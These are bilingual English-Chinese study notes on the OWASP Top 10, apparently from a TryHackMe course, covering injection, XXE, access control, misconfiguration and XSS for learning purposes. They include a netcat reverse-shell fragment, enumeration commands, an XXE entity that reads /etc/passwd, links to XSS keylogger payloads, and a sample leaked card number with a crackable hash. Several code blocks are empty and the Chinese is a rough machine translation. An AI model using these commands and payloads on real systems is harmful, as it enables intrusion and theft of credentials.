OWASP Top 10
相关介绍:https://github.com/OWASP/Top10
部分翻译欠佳,还在学习
Introduction
- Injection
- Broken Authentication
- Sensitive Data Exposure
- XML External Entity
- Broken Access Control
- Security Misconfiguration
- Cross-site Scripting
- Insecure Deserialization
- Components with Known Vulnerabilities
[Severity 1] Injection
Injection
Injection flaws are very common in applications today. These flaws occur because user controlled input is interpreted as actual commands or parameters by the application. Injection attacks depend on what technologies are being used and how exactly the input is interpreted by these technologies. Some common examples include:当今的应用中,注入漏洞非常普遍。这些漏洞之所以发生,是因为用户控制的输入被应用程序解释为实际命令或参数。注入攻击取决于使用了哪些技术以及这些技术如何确切解释输入。一些常见的例子包括:
- SQL Injection: This occurs when user controlled input is passed to SQL queries. As a result, an attacker can pass in SQL queries to manipulate the outcome of such queries. SQL注入:这是当将用户控制的输入传递给SQL查询时发生。结果,攻击者可以通过SQL查询来操纵此类查询的结果。
- Command Injection: This occurs when user input is passed to system commands. As a result, an attacker is able to execute arbitrary system commands on application servers.命令注入:这是当将用户输入传递给系统命令时发生。结果,攻击者能够在应用程序服务器上执行任意系统命令。
If an attacker is able to successfully pass input that is interpreted correctly, they would be able to do the following:如果攻击者能够成功地通过正确解释的输入,他们将能够执行以下操作:
- Access, Modify and Delete information in a database when this input is passed into database queries. This would mean that an attacker can steal sensitive information such as personal details and credentials.当此输入传递到数据库查询中时,访问,修改和删除数据库中的信息。这意味着攻击者可以窃取敏感信息,例如个人详细信息和证书。
- Execute Arbitrary system commands on a server that would allow an attacker to gain access to users’ systems. This would enable them to steal sensitive data and carry out more attacks against infrastructure linked to the server on which the command is executed.在服务器上执行任意系统命令,该命令将允许攻击者访问用户系统。这将使他们能够窃取敏感数据,并对链接到执行命令的服务器的基础结构进行更多攻击。
The main defence for preventing injection attacks is ensuring that user controlled input is not interpreted as queries or commands. There are different ways of doing this:防止注射攻击的主要防御是确保用户控制的输入不会被解释为查询或命令。有不同的方法:
- Using an allow list: when input is sent to the server, this input is compared to a list of safe input or characters. If the input is marked as safe, then it is processed. Otherwise, it is rejected and the application throws an error.使用允许列表:将输入发送到服务器时,将此输入与安全输入或字符的列表进行比较。如果输入标记为安全,则将处理。否则,它将被拒绝,并且该应用程序会引发错误。
- Stripping input: If the input contains dangerous characters, these characters are removed before they are processed.剥离输入:如果输入包含危险字符,则将这些字符在处理之前将其删除。
Dangerous characters or input is classified as any input that can change how the underlying data is processed. Instead of manually constructing allow lists or even just stripping input, there are various libraries that perform these actions for you.危险字符或输入被归类为可以改变基础数据处理方式的任何输入。有些库无需手动构建列表,甚至只是剥离输入,而是为您执行这些操作。
OS Command Injection
Command Injection occurs when server-side code (like PHP) in a web application makes a system call on the hosting machine. It is a web vulnerability that allows an attacker to take advantage of that made system call to execute operating system commands on the server. Sometimes this won’t always end in something malicious, like a whoami
or just reading of files. That isn’t too bad. But the thing about command injection is it opens up many options for the attacker. The worst thing they could do would be to spawn a reverse shell to become the user that the web server is running as. A simple ;nc -e /bin/bash
is all that’s needed and they own your server; some variants of netcat don’t support the -e option. You can use a list of [these](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md) reverse shells as an alternative.
当Web应用程序中的服务器端代码(如PHP)在托管机上调用系统调用时,就会发生命令注入。 这是一个Web漏洞,允许攻击者利用该制作的系统调用来执行服务器上的操作系统命令。 有时,这不会总是以恶意的方式结束,例如whoami或仅阅读文件。 那还不错。 但是,关于命令注射的问题是,它为攻击者打开了许多选择。 他们能做的最糟糕的事情是产生反弹shell,以成为Web服务器正在运行的用户。 一个简单的; NC -E /bin /bash是所有需要的,并且它们拥有您的服务器; NETCAT的某些变体不支持-e选项。 您可以将这些反弹shell的列表作为替代方案。
Once the attacker has a foothold on the web server, they can start the usual enumeration of your systems and start looking for ways to pivot around. Now that we know what command injection is, we’ll start going into the different types and how to test for them.一旦攻击者在Web服务器上有立足点,他们就可以开始对系统的通常枚举,并开始寻找弹shell的方法。 现在我们知道了命令注入是什么,我们将开始进入不同类型以及如何测试它们。
Command Injection Practical
**What is Active Command Injection?**什么是主动命令注入?
Blind command injection occurs when the system command made to the server does not return the response to the user in the HTML document. Active command injection will return the response to the user. It can be made visible through several HTML elements. 当系统对服务器的命令未返回HTML文档中用户的响应时,就会发生盲命令注入(盲注)。 主动命令注入将返回对用户的响应。 可以通过几个HTML元素使其可见。
Let’s consider a scenario: EvilCorp has started development on a web based shell but has accidentally left it exposed to the Internet. It’s nowhere near finished but contains the same command injection vulnerability as before! But this time, the response from the system call can be seen on the page! They’ll never learn!让我们考虑一个场景:Evilcorp已开始在基于Web的壳上开发,但意外地将其暴露于互联网上。 它尚未完成,但包含与以前相同的命令注射漏洞! 但是这次,可以在页面上看到系统调用的响应! 他们永远不会注意!
Just like before, let’s look at the sample code from evilshell.php and go over what it’s doing and why it makes it active command injection. See if you can figure it out. I’ll go over it below just as before.就像以前一样,让我们看一下evilshell.php的示例代码,然后介绍它在做什么以及为什么它使其积极的命令注入。 看看您是否可以弄清楚。 我会像以前一样在下面浏览它。
EvilShell (evilshell.php) Code ExampleEvilshell(Evilshell.php)代码示例:
1 |
|
In pseudocode, the above snippet is doing the following:在伪代码中,以上片段正在执行以下操作:
Checking if the parameter “commandString” is set1。检查是否设置了参数1“commandString”
If it is, then the variable
$command_string
gets what was passed into the input field2。如果是,则变量$ command_string获取传递到输入字段2的内容The program then goes into a try block to execute the function
passthru($command_string)
. You can read the docs onpassthru()
on PHP’s website, but in general, it is executing what gets entered into the input then passing the output directly back to the browser.3。然后该程序进入一个尝试块以执行函数PassThru($ command_string)。 可以在PHP网站上的PassThru()上读取文档,但总的来说,它正在执行输入这输入的内容,然后将输出直接传递回浏览器。If the try does not succeed, output the error to page. Generally this won’t output anything because you can’t output stderr but PHP doesn’t let you have a try without a catch.4。如果尝试未成功,请将错误输出到页面。 通常,这不会输出任何内容,因为您无法输出STDERR,但是PHP不会让您在没有捕获的情况下尝试。
Ways to Detect Active Command Injection
We know that active command injection occurs when you can see the response from the system call. In the above code, the function passthru()
is actually what’s doing all of the work here. It’s passing the response directly to the document so you can see the fruits of your labor right there. Since we know that, we can go over some useful commands to try to enumerate the machine a bit further. The function call here to passthru()
may not always be what’s happening behind the scenes, but I felt it was the easiest and least complicated way to demonstrate the vulnerability. 我们知道,当您可以看到系统调用的响应时,就会发生主动命令注入。 在上面的代码中,函数PassThru()实际上是在此处完成所有工作的功能。 它直接将响应传递给文档,因此您可以在那里看到劳动的果实。 由于我们知道,我们可以仔细阅读一些有用的命令,以尝试进一步枚举机器。 在此处调用PassThru()的功能可能并不总是是幕后发生的事情,但是我觉得这是证明脆弱性的最简单最小的方法。
Commands to try
Linux
- whoami
- id
- ifconfig/ip addr
- uname -a
- ps -ef
Windows
whoami
ver
ipconfig
tasklist
netstat -an
What is the user’s shell set as?
1 | echo $SHELL |
What version of Ubuntu is running?
1 | cat /etc/issue |
[Severity 2] Broken Authentication
Broken Authentication
Authentication and session management constitute core components of modern web applications. Authentication allows users to gain access to web applications by verifying their identities. The most common form of authentication is using a username and password mechanism. A user would enter these credentials, the server would verify them. If they are correct, the server would then provide the users’ browser with a session cookie. A session cookie is needed because web servers use HTTP(S) to communicate which is stateless. Attaching session cookies means that the server will know who is sending what data. The server can then keep track of users’ actions. 身份验证和会话管理构成现代Web应用程序的核心组成部分。身份验证使用户可以通过验证其身份来访问Web应用程序。身份验证的最常见形式是使用用户名和密码机制。用户将输入这些凭据,服务器将验证它们。如果它们正确,则服务器将为用户的浏览器提供会话cookie。需要会话cookie是因为Web服务器使用HTTP(S)进行通信,这是无状态的。附加会话cookie意味着服务器将知道谁在发送哪些数据。然后,服务器可以跟踪用户的操作。
If an attacker is able to find flaws in an authentication mechanism, they would then successfully gain access to other users’ accounts. This would allow the attacker to access sensitive data (depending on the purpose of the application). Some common flaws in authentication mechanisms include:如果攻击者能够在身份验证机制中找到缺陷,那么他们将成功访问其他用户的帐户。这将允许攻击者访问敏感数据(取决于应用程序的目的)。身份验证机制中的一些常见缺陷包括:
- Brute force attacks: If a web application uses usernames and passwords, an attacker is able to launch brute force attacks that allow them to guess the username and passwords using multiple authentication attempts. 蛮力攻击:如果Web应用程序使用用户名和密码,则攻击者能够发射蛮力攻击,使他们可以使用多个身份验证尝试猜测用户名和密码。
- Use of weak credentials: web applications should set strong password policies. If applications allow users to set passwords such as ‘password1’ or common passwords, then an attacker is able to easily guess them and access user accounts. They can do this without brute forcing and without multiple attempts.使用弱凭据:Web应用程序应设置强密码策略。如果应用程序允许用户设置“密码1”或常见密码之类的密码,则攻击者可以轻松猜测它们并访问用户帐户。他们可以在不强迫的情况下做到这一点,而无需多次尝试。
- Weak Session Cookies: Session cookies are how the server keeps track of users. If session cookies contain predictable values, an attacker can set their own session cookies and access users’ accounts. 较弱的会话cookie:会话cookie是服务器跟踪用户的方式。如果会话cookie包含可预测的值,则攻击者可以设置自己的会话cookie并访问用户的帐户。
There can be various mitigation for broken authentication mechanisms depending on the exact flaw:根据确切的缺陷,可以进行各种缓解措施,以破坏身份验证机制:
- To avoid password guessing attacks, ensure the application enforces a strong password policy. 为避免密码猜测攻击,请确保应用程序执行强大的密码策略。
- To avoid brute force attacks, ensure that the application enforces an automatic lockout after a certain number of attempts. This would prevent an attacker from launching more brute force attacks.为避免蛮力攻击,请确保应用程序在尝试一定数量的尝试后执行自动锁定。这将防止攻击者发动更多的蛮力攻击。
- Implement Multi Factor Authentication - If a user has multiple methods of authentication, for example, using username and passwords and receiving a code on their mobile device, then it would be difficult for an attacker to get access to both credentials to get access to their account.实现多因素身份验证 - 如果用户具有多种身份验证方法,例如,使用用户名和密码并在其移动设备上接收代码,那么攻击者很难访问两个凭据很难访问其帐户。
Practical
Let’s understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter “ admin”(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. That new user will also be able to see all the content presented under the user admin.让我们在示例的帮助下理解这一点,例如有一个名为Admin的现有用户,现在我们想访问他们的帐户,因此我们可以做的就是尝试重新注册该用户名,但要进行稍作修改。我们将输入“ admin”(请注意开始中的空间)。现在,当您在用户名字段中输入并输入其他必需的信息(例如电子邮件ID或密码)并提交该数据。它实际上将注册一个新用户,但是该用户的权利与普通管理员相同。该新用户还将能够查看用户管理下介绍的所有内容。
[Severity 3] Sensitive Data Exposure
Introduction
When a webapp accidentally divulges sensitive data, we refer to it as “Sensitive Data Exposure”. This is often data directly linked to customers (e.g. names, dates-of-birth, financial information, etc), but could also be more technical information, such as usernames and passwords. At more complex levels this often involves techniques such as a “Man in The Middle Attack”, whereby the attacker would force user connections through a device which they control, then take advantage of weak encryption on any transmitted data to gain access to the intercepted information (if the data is even encrypted in the first place…). Of course, many examples are much simpler, and vulnerabilities can be found in web apps which can be exploited without any advanced networking knowledge. Indeed, in some cases, the sensitive data can be found directly on the webserver itself…当WebApp意外泄露敏感数据时,我们将其称为“敏感数据暴露”。这通常是直接链接到客户的数据(例如名称,出生日期,财务信息等),但也可能是更多的技术信息,例如用户名和密码。在更复杂的水平下,这通常涉及诸如“中间攻击中的人”之类的技术,攻击者将迫使用户通过他们控制的设备进行连接,然后利用任何传输数据上的弱加密来访问拦截信息(如果数据甚至首先是加密的,则是…)。当然,许多示例要简单得多,并且可以在Web应用程序中找到漏洞,可以在没有任何高级网络知识的情况下被利用。确实,在某些情况下,敏感数据可以直接在Web服务器本身上找到…
Supporting Material 1
SQL语言
Let’s suppose we have successfully managed to download a database:假设我们已经成功下载了一个数据库:
We can see that there is an SQlite database in the current folder.我们可以看到当前文件夹中有一个SQLite数据库。
To access it we use: sqlite3 <database-name>
:要访问它,我们使用:sqlite3 <数据库名称>:
From here we can see the tables in the database by using the .tables
command:从这里,我们可以使用.tables命令在数据库中看到表:
At this point we can dump all of the data from the table, but we won’t necessarily know what each column means unless we look at the table information. First let’s use PRAGMA table_info(customers);
to see the table information, then we’ll use SELECT * FROM customers;
to dump the information from the table:在这一点上,我们可以将所有数据从表中倾倒,但是除非我们查看表信息,否则我们不一定知道每列的含义。首先,让我们使用pragma table_info(客户); 要查看表信息,然后我们将使用Select *向客户使用; 从表中倾倒信息:
We can see from the table information that there are four columns: custID, custName, creditCard and password. You may notice that this matches up with the results. Take the first row:从表信息中我们可以看到,有四列:CUSTID,CUSTNAME,CRESITCARD和密码。您可能会注意到这与结果相匹配。进行第一行:
1 | 0|Joy Paulson|4916 9012 2231 7905|5f4dcc3b5aa765d61d8327deb882cf990 | Joy Paulson | 4916 9012 2231 7905 | 5F4DCC3B5AA765D61D8327DEB8882CF99 |
We have the custID (0), the custName (Joy Paulson), the creditCard (4916 9012 2231 7905) and a password hash (5f4dcc3b5aa765d61d8327deb882cf99).我们有CustId(0),CustName(Joy Paulson),信用卡(4916 9012 2231 7905)和密码哈希(5F4DCC3B5AA765D61D8327DEB8882CF99)。
Supporting Material 2
Instead we will be using the online tool: Crackstation. This website is extremely good at cracking weak password hashes. For more complicated hashes we would need more sophisticated tools; however, all of the crackable password hashes used in today’s challenge are weak MD5 hashes, which Crackstation should handle very nicely indeed.相反,我们将使用在线工具:CrackStation。该网站非常擅长破解弱密码哈希。对于更复杂的哈希,我们需要更复杂的工具;但是,在当今挑战中使用的所有可破解密码哈希是弱MD5哈希,裂纹站确实应该很好地处理。
[Severity 4] XML External Entity
An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.
XML外部实体(XXE)攻击是滥用XML解析器/数据功能的漏洞。它通常允许攻击者与应用程序本身可以访问的任何后端或外部系统进行交互,并且可以允许攻击者读取该系统上的文件。它们还可以引起拒绝服务(DOS)攻击,或者可以使用XXE执行服务器端请求伪造(SSRF),以诱导Web应用程序向其他应用程序提出请求。 XXE甚至可以启用端口扫描并导致远程代码执行。
There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
XXE攻击有两种类型:带外和带外(OOB-XXE)。
An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.1)带内XXE攻击是攻击者可以立即收到对XXE有效载荷的反应的攻击。
out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.2)带外XXE攻击(也称为盲人XXE),Web应用程序没有立即响应,攻击者必须反映其XXE有效载荷的输出到其他文件或其自己的服务器。
Before we move on to learn about XXE exploitation we’ll have to understand XML properly.在我们继续了解XXE开发之前,我们必须正确理解XML。
eXtensible Markup Language
What is XML?什么是XML?
XMLXML (eXtensible Markup Language) is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is a markup language used for storing and transporting data. (可扩展的标记语言)是一种标记语言,它定义了一组以人为可读且可读的格式编码文档的规则。这是一种用于存储和运输数据的标记语言。
Why we use XML?为什么我们使用XML?
XML is platform-independent and programming language independent, thus it can be used on any system and supports the technology change when that happens.1。XML独立于平台独立且编程语言,因此可以在任何系统上使用,并在发生这种情况时支持技术的变化。
The data stored and transported using XML can be changed at any point in time without affecting the data presentation.2。使用XML存储和运输的数据可以在任何时间点更改而不影响数据表示情况。
XML allows validation using DTD and Schema. This validation ensures that the XML document is free from any syntax error.3。XML允许使用DTD和模式进行验证。此验证可确保XML文档免于任何语法错误。
XML simplifies data sharing between various systems because of its platform-independent nature. XML data doesn’t require any conversion when transferred between different systems.4。XML由于其与平台无关的性质,简化了各种系统之间的数据共享。 XML数据在不同系统之间传输时不需要任何转换。
Syntax句法
Every XML document mostly starts with what is known as XML Prolog.每个XML文档主要始于所谓的XML Prolog。
Above the line is called XML prolog and it specifies the XML version and the encoding used in the XML document. This line is not compulsory to use but it is considered a good practice
to put that line in all your XML documents.该行上方称为XML Prolog,它指定了XML版本和XML文档中使用的编码。这条线不是强制使用的,但是将该行放入所有XML文档中被认为是一种“好练习”。
Every XML document must contain a ROOT
element. For example:每个XML文档都必须包含一个“ root”元素。例如:
1 | <?xml version="1.0" encoding="UTF-8"?> |
In the above example the <mail>
is the ROOT element of that document and <to>
, <from>
, <subject>
, <text>
are the children elements. If the XML document doesn’t have any root element then it would be consideredwrong
or invalid
XML doc.在上面的示例中,
Another thing to remember is that XML is a case sensitive language. If a tag starts like <to>
then it has to end by </to>
and not by something like </To>
(notice the capitalization of T
)要记住的另一件事是XML是一种标签敏感语言。如果标签始于
Like HTML we can use attributes in XML too. The syntax for having attributes is also very similar to HTML. For example:像HTML一样,我们也可以在XML中使用属性。具有属性的语法也与HTML非常相似。例如:<text category = "message">You need to learn about XXE</text>
In the above example category
is the attribute name and message
is the attribute value.在上面的示例中,类别是属性名称,消息是属性值。
DTD
Before we move on to start learning about XXE we’ll have to understand what is DTD in XML.在我们继续学习XXE之前,我们必须了解XML中的DTD是什么。
DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document.DTD代表文档类型定义。 DTD定义了XML文档的结构和法律元素和属性。
Let us try to understand this with the help of an example. Say we have a file named note.dtd
with the following content:让我们尝试在一个例子的帮助下理解这一点。说我们有一个名为Note.dtd的文件,其中包含以下内容:
1 | <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> |
Now we can use this DTD to validate the information of some XML document and make sure that the XML file conforms to the rules of that DTD.
现在,我们可以使用此DTD来验证某些XML文档的信息,并确保XML文件符合该DTD的规则。
Ex: Below is given an XML document that uses note.dtd
例如:下面给出了使用Note.dtd的XML文档
1 |
|
So now let’s understand how that DTD validates the XML. Here’s what all those terms used in note.dtd
mean因此,现在让我们了解该DTD如何验证XML。这是所有这些术语note.dtd中的意思
!DOCTYPE note - Defines a root element of the document named note!Doctype Note-定义文档的根元素,名为Note
!ELEMENT note - Defines that the note element must contain the elements: “to, from, heading, body”!
!ELEMENT to - Defines the
to
element to be of type “#PCDATA”!!ELEMENT from - Defines the
from
element to be of type “#PCDATA”!元素来自 - 定义从元素到类型为“ #pcdata”的元素!ELEMENT heading - Defines the
heading
element to be of type “#PCDATA”!元素标题 - 将标题元素定义为类型为“ #pcdata”!ELEMENT body - Defines the
body
element to be of type “#PCDATA”!元素主体 - 将身体元素定义为“ #pcdata”类型NOTE: #PCDATA means parseable character data.注意:#pcdata表示可简洁的字符数据。
XXE payload
Now we’ll see some XXE payload and see how they are working.现在,我们将看到一些XXE有效负载,看看它们的工作原理。
- The first payload we’ll see is very simple. If you’ve read the previous task properly then you’ll understand this payload very easily.1)我们看到的第一个有效载荷非常简单。如果您正确阅读了以前的任务,那么您将非常容易理解此有效负载。
1 |
|
As we can see we are defining a ENTITY
called name
and assigning it a value feast
. Later we are using that ENTITY in our code.如我们所见,我们正在定义一个称为名称的实体并将其分配为价值盛宴。后来,我们在代码中使用该实体。
- We can also use XXE to read some file from the system by defining an ENTITY and having it use the SYSTEM keyword2)我们还可以使用XXE来通过定义实体并使用系统关键字来读取系统中的某些文件
1 |
|
Here again, we are defining an ENTITY with the name read
but the difference is that we are setting it value to SYSTEM
and path of the file.再次,我们正在定义一个具有读取名称的实体,但区别在于,我们将其设置为“系统”和文件路径。
If we use this payload then a website vulnerable to XXE(normally) would display the content of the file /etc/passwd
.如果我们使用此有效载荷,则容易受到XXE的网站(通常)将显示文件/etc/passwd的内容。
In a similar manner, we can use this kind of payload to read other files but a lot of times you can fail to read files in this manner or the reason for failure could be the file you are trying to read.以类似的方式,我们可以使用这种有效载荷来读取其他文件,但是很多次,您可能无法以这种方式读取文件,或者失败的原因可能是您要读取的文件。
Exploiting
Now let us see some payloads in action. The payload that I’ll be using is the one we saw in the previous task.现在,让我们查看一些有效负载。我将使用的有效载荷是我们在上一个任务中看到的有效载荷。
- Let’s see how the website would look if we’ll try to use the payload for displaying the name.1)如果我们尝试使用有效载荷显示名称,让我们看看网站的外观。
On the left side, we can see the burp request that was sent with the URL encoded payload and on the right side we can see that the payload was able to successfully display name falcon feast
在左侧,我们可以看到带有URL编码有效载荷发送的BURP请求,在右侧,我们可以看到有效载荷能够成功显示名称猎鹰盛宴
- Now let’s try to read the
/etc/passwd
2)现在让我们尝试阅读/etc/passwd
[Severity 5] Broken Access Control
Websites have pages that are protected from regular visitors, for example only the site’s admin user should be able to access a page to manage other users. If a website visitor is able to access the protected page/pages that they are not authorised to view, the access controls are broken.网站的页面具有受到常规访问者的保护,例如,只有网站的管理员用户才能访问页面以管理其他用户。如果网站访问者能够访问未被授权查看的受保护的页面/页面,则访问控件将被打破。
A regular visitor being able to access protected pages, can lead to the following:常规访问者能够访问受保护的页面,可以导致以下内容:
- Being able to view sensitive information能够查看敏感信息
- Accessing unauthorized functionality访问未经授权的功能
OWASP have a listed a few attack scenarios demonstrating access control weaknesses:
OWASP已列出了一些攻击方案,证明了访问控制弱点:
Scenario #1: The application uses unverified data in a SQL call that is accessing account information:方案#1:该应用程序在访问帐户信息的SQL调用中使用未验证的数据:
pstmt.setString(1, request.getParameter(“acct”));PSTMT.SetString(1,request.getParameter(“ acct”));
An attacker simply modifies the ‘acct’ parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user’s account.攻击者只需修改浏览器中的“ ACCT”参数,以发送他们想要的任何帐号。如果未经正确的验证,攻击者可以访问任何用户的帐户。
http://example.com/app/accountInfo?acct=notmyacct
Scenario #2: An attacker simply force browses to target URLs. Admin rights are required for access to the admin page.方案#2:攻击者只会强迫浏览到针对URL。访问管理页面需要管理权。
http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo
If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin page, this is a flaw (reference to scenarios).如果未经验证的用户可以访问任何一个页面,则是一个缺陷。如果非应用程序可以访问管理页面,则是一个缺陷(引用方案)。
To put simply, broken access control allows attackers to bypass authorization which can allow them to view sensitive data or perform tasks as if they were a privileged user.简而言之,损坏的访问控制允许攻击者绕过授权,这可以使他们能够查看敏感数据或执行任务,就好像他们是特权用户一样。
IDOR Challenge
IDOR, or Insecure Direct Object Reference, is the act of exploiting a misconfiguration in the way user input is handled, to access resources you wouldn’t ordinarily be able to access. IDOR is a type of access control vulnerability.依恋或不安全的直接对象参考是通过处理用户输入的方式来利用错误配置的行为,以访问通常无法访问的资源。 IDOR是一种访问控制漏洞。
For example, let’s say we’re logging into our bank account, and after correctly authenticating ourselves, we get taken to a URL like this https://example.com/bank?account_number=1234. On that page we can see all our important bank details, and a user would do whatever they needed to do and move along their way thinking nothing is wrong.例如,假设我们正在登录我们的银行帐户,并且在正确身份验证自己之后,我们将其访问到这样的URL https://example.com/bank?account_number=1234。在该页面上,我们可以看到我们所有重要的银行详细信息,用户将尽一切努力做任何事情,并沿着他们的途中移动认为没有错。
There is however a potentially huge problem here, a hacker may be able to change the account_number parameter to something else like 1235, and if the site is incorrectly configured, then he would have access to someone else’s bank information.但是,这里存在一个可能的巨大问题,黑客可能能够将帐户参数更改为1235之类的内容,如果网站配置不正确,那么他将可以访问其他人的银行信息。
[Severity 6] Security Misconfiguration
Security Misconfigurations are distinct from the other Top 10 vulnerabilities, because they occur when security could have been configured properly but was not.安全性错误配置与其他前10个漏洞不同,因为当安全性配置正确但事实并非如此。
Security misconfigurations include:安全性错误包括:
- Poorly configured permissions on cloud services, like S3 buckets在云服务上配置不良的权限,例如S3存储桶
- Having unnecessary features enabled, like services, pages, accounts or privileges启用了不必要的功能,例如服务,页面,帐户或特权
- Default accounts with unchanged passwords带有不变密码的默认帐户
- Error messages that are overly detailed and allow an attacker to find out more about the system错误消息过于详细,允许攻击者了解有关系统的更多信息
- Not using HTTP security headers, or revealing too much detail in the Server: HTTP header不使用HTTP安全标头,也不使用服务器中的太多细节:HTTP标头
This vulnerability can often lead to more vulnerabilities, such as default credentials giving you access to sensitive data, XXE or command injection on admin pages.这种漏洞通常会导致更多的漏洞,例如默认凭据,使您可以在管理页面上访问敏感数据,XXE或命令注入。
For more info, I recommend having a look at the OWASP top 10 entry for Security Misconfiguration有关更多信息,我建议您查看OWASP前10名条目以进行安全性错误
Default Passwords
Specifically, this VM focusses on default passwords. These are a specific example of a security misconfiguration. You could, and should, change any default passwords but people often don’t.具体来说,此VM专注于默认密码。这些是安全性错误的特定示例。您可以并且应该更改任何默认密码,但人们通常不会更改。
It’s particularly common in embedded and Internet of Things devices, and much of the time the owners don’t change these passwords.它在嵌入式和物联网设备中尤为常见,并且大多数时候所有者都不会更改这些密码。
It’s easy to imagine the risk of default credentials from an attacker’s point of view. Being able to gain access to admin dashboards, services designed for system administrators or manufacturers, or even network infrastructure could be incredibly useful in attacking a business. From data exposure to easy RCE, the effects of default credentials can be severe.从攻击者的角度来看,很容易想象默认凭证的风险。能够访问管理仪表板,为系统管理员或制造商设计的服务,甚至网络基础架构在攻击企业方面可能非常有用。从数据暴露到Easy RCE,默认凭据的影响可能很严重。
In October 2016, Dyn (a DNS provider) was taken offline by one of the most memorable DDoS attacks of the past 10 years. The flood of traffic came mostly from Internet of Things and networking devices like routers and modems, infected by the Mirai malware.2016年10月,Dyn(DNS提供商)被过去10年中最令人难忘的DDOS袭击之一离线。流量泛滥大多来自物联网和网络设备,例如路由器和调制解调器,被Mirai恶意软件感染。
How did the malware take over the systems? Default passwords. The malware had a list of 63 username/password pairs, and attempted to log in to exposed telnet services.恶意软件是如何接管系统的?默认密码。该恶意软件有63个用户名/密码对的列表,并试图登录到暴露的Telnet服务。
The DDoS attack was notable because it took many large websites and services offline. Amazon, Twitter, Netflix, GitHub, Xbox Live, PlayStation Network, and many more services went offline for several hours in 3 waves of DDoS attacks on Dyn.DDOS攻击之所以引人注目,是因为它脱机了许多大型网站和服务。亚马逊,Twitter,Netflix,Github,Xbox Live,PlayStation Network和更多服务在3波DDOS攻击中脱机了几个小时。
Practical example
This VM showcases a Security Misconfiguration
, as part of the OWASP Top 10 Vulnerabilities list.该VM作为OWASP前10名漏洞列表的一部分,展示了安全性错误。
Deploy the VM, and hack in by exploiting the Security Misconfiguration!部署VM,并通过利用安全性错误来侵入!
NinjaJc01/PensiveNotes: PensiveNotes - A note taking app
pensive:PensiveNotes
[Severity 7] Cross-site Scripting
XSS Explained
Cross-site scripting, also known as XSS is a security vulnerability typically found in web applications. It’s a type of injection which can allow an attacker to execute malicious scripts and have it execute on a victim’s machine.跨站点脚本(也称为XSS)是通常在Web应用程序中找到的安全漏洞。这是一种注入,可以使攻击者可以执行恶意脚本并在受害者的机器上执行。
A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS. There are three main types of cross-site scripting:如果Web应用程序使用不动动的用户输入,则容易受到XSS的影响。 JavaScript,VBScript,Flash和CSS可能是XSS。跨站点脚本有三种主要类型:
- Stored XSS - the most dangerous type of XSS. This is where a malicious string originates from the website’s database. This often happens when a website allows user input that is not sanitised (remove the “bad parts” of a users input) when inserted into the database.存储的XSS-最危险的XSS类型。这是恶意字符串来自网站数据库的地方。当网站允许未经卫生的用户输入(删除用户输入的“不良部分”)时,这通常会发生。
- Reflected XSS - the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.反射XSS-恶意有效载荷是受害者要求网站的一部分。该网站包括此有效载荷以回复用户。总而言之,攻击者需要欺骗受害者单击URL以执行其恶意有效载荷。
- DOM-Based XSS - DOM stands for Document Object Model and is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style and content. A web page is a document and this document can be either displayed in the browser window or as the HTML source.基于DOM的XS-DOM代表文档对象模型,是HTML和XML文档的编程接口。它代表页面,以便程序可以更改文档的结构,样式和内容。网页是一个文档,该文档可以显示在浏览器窗口中,也可以作为HTML源显示。
For more XSS explanations and exercises, check out the XSS room.有关更多XSS的解释和练习,请查看XSS房间。
XSS Payloads
Remember, cross-site scripting is a vulnerability that can be exploited to execute malicious Javascript on a victim’s machine. Check out some common payloads types used:请记住,跨站点脚本是一种漏洞,可以利用在受害者的机器上执行恶意JavaScript。查看一些使用的常见有效载荷类型:
Popup’s () - Creates a Hello World message popup on a users browser.
弹出窗口() - 在用户浏览器上创建Hello World Message弹出窗口。
Writing HTML (document.write) - Override the website’s HTML to add your own (essentially defacing the entire page).
编写HTML(Document.Write) - 覆盖网站的HTML以添加您自己的HTML(本质上是拆除整个页面)。
XSS Keylogger (http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html) - You can log all keystrokes of a user, capturing their password and other sensitive information they type into the webpage.
XSS KeyLogger(http://www.xss-payloads.com/payloads/payloads/scripts/simplekeylogger.js.html) - 您可以记录用户的所有键,捕获其密码和其他敏感信息,然后将其输入网页。
Port scanning (http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html) - A mini local port scanner (more information on this is covered in the TryHackMe XSS room)
端口扫描(http://www.xss-payloads.com/payloads/scripts/portscripts/portscanapi.js.html) - 迷你本地端口扫描仪(有关此此信息的更多信息在Tryhackme XSS Room中介绍)。
XSS-Payloads.com (http://www.xss-payloads.com/) is a website that has XSS related Payloads, Tools, Documentation and more. You can download XSS payloads that take snapshots from a webcam or even get a more capable port and network scanner.XSS-Payloads.com(http://www.xss-payloads.com/)是一个具有相关的有效载荷,工具,文档等的网站。您可以下载XSS有效载荷,这些有效载荷从网络摄像头中拍摄快照,甚至可以获取功能更强大的端口和网络扫描仪。
XSS ChallengeXSS挑战
